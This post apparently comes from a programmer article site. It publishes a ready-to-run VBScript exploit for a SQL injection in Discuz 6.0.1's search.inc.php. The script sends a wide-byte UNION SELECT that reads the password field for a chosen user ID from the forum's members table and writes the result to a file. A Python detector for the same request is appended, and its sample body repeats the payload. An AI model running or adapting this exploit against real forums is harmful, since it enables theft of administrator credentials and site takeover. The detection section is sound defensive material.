VBS version of an exploit tool for the Discuz vulnerability that obtains any administrator's password
程序员文章站
2022-03-19 15:56:28
The following is the VBS version of the exploit code for the search.inc.php vulnerability.
[code]
dim strurl,strsite,strpath,struid
showb()
set args = wscript.arguments
if args.count <> 3 then
    showu()
else
    strsite=args(0)
    strpath=args(1)
    struid=args(2)
end if
strurl="action=search&searchid=22%cf' union select 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & struid &"/*&do=submit"
set objxml = createobject("microsoft.xmlhttp")
objxml.open "post",strsite & strpath & "index.php", false
objxml.setrequestheader "accept", "*/*"
objxml.setrequestheader "accept-language", "zh-cn"
objxml.setrequestheader "content-type", "application/x-www-form-urlencoded"
objxml.setrequestheader "user-agent", "wap"
objxml.send(strurl)
wscript.echo(objxml.responsetext)

sub showb()
    with wscript
        .echo("+--------------------------=====================------------------------------+")
        .echo("exploit discuz6.0.1")
        .echo("code by safe3")
        .echo("+--------------------------=====================------------------------------+")
    end with
end sub

sub showu()
    with wscript
        .echo("+--------------------------=====================------------------------------+")
        .echo("用法:")
        .echo(" cscript "&.scriptname&" site path uid")
        .echo("例子:")
        .echo(" cscript "&.scriptname&" http://www.example.com/ /forum/ 1 >result.txt")
        .echo("+--------------------------=====================------------------------------+")
        .quit
    end with
end sub
[/code]
Look through result.txt yourself to find the retrieved password.
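For defenders, the request this script sends can be recognized in captured POST bodies. The Python check below is an added example, not part of the original post or of Discuz; the function name, the sample bodies and the assumption that a legitimate searchid is a plain integer are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl

# Constructed samples: the first mirrors the request body built by the script above (uid 1).
ATTACK_BODY = ("action=search&searchid=22%cf' union select 1,password,3,password"
               "/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit")
BENIGN_BODY = "action=search&searchid=22&do=submit"

# UNION and SELECT separated by whitespace or /**/ comments.
UNION_SELECT = re.compile(r"union(?:\s|/\*.*?\*/)+select", re.I | re.S)
# A byte >= 0x80 directly before a quote or backslash, the shape of "%cf'" above.
HIGH_BYTE_QUOTE = re.compile(r"[\x80-\xff]['\"\\]")


def inspect_search_post(body: str) -> list[str]:
    """Return the reasons a form-encoded POST body to index.php looks suspicious."""
    # latin-1 maps each %XX escape to one character, so raw high bytes stay visible.
    params = dict(parse_qsl(body, keep_blank_values=True, encoding="latin-1"))
    if params.get("action") != "search" or "searchid" not in params:
        return []
    searchid = params["searchid"]
    reasons = []
    # Assumption of this example: a legitimate searchid is a plain integer.
    if not re.fullmatch(r"[0-9]+", searchid):
        reasons.append("searchid is not a plain integer")
    if HIGH_BYTE_QUOTE.search(searchid):
        reasons.append("high byte directly before a quote or backslash")
    if UNION_SELECT.search(searchid):
        reasons.append("UNION SELECT inside searchid")
    if "cdb_members" in searchid.lower():
        reasons.append("references the cdb_members table")
    return reasons


if __name__ == "__main__":
    for sample in (ATTACK_BODY, BENIGN_BODY):
        print(inspect_search_post(sample) or "clean")
```

The same integer-only rule, enforced server-side on searchid before it reaches the query, is the corresponding input-validation control.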